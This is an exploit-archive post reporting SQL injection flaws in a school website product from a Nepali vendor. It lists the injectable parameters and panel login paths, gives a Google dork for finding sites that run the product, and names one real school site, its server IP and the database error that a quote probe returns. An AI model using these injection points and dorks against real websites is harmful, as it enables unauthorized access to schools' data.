facebook facebook twitter rss

Technology Software Nepal SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : Iceberg Technology Software Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : icebergtechnepal.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''Developed by:Iceberg Technology'' site:edu.np
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

#########################################################

# Admin/Teacher/Student Panel Login Path :
**************************************

/teacher/index.php
/student/index.php

# SQL Injection Exploit :
*********************

/news.php?id=[SQL Injection]

/photo.php?edit=[SQL Injection]

/about.php?Title=[SQL Injection]

/admission.php?Title=[SQL Injection]

#########################################################

# Example Vulnerable Site =>
**************************

Note => (192.185.142.207) => There are 57 domains hosted on this server.

[+] basiclearning.edu.np/news.php?id=42%27 =>

[ Proof of Concept ] => archive.fo/5ILQG

#########################################################

# SQL Database Error :
********************

Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/basiclea/public_html/news.php on line 24

#########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#########################################################

Like us on Facebook :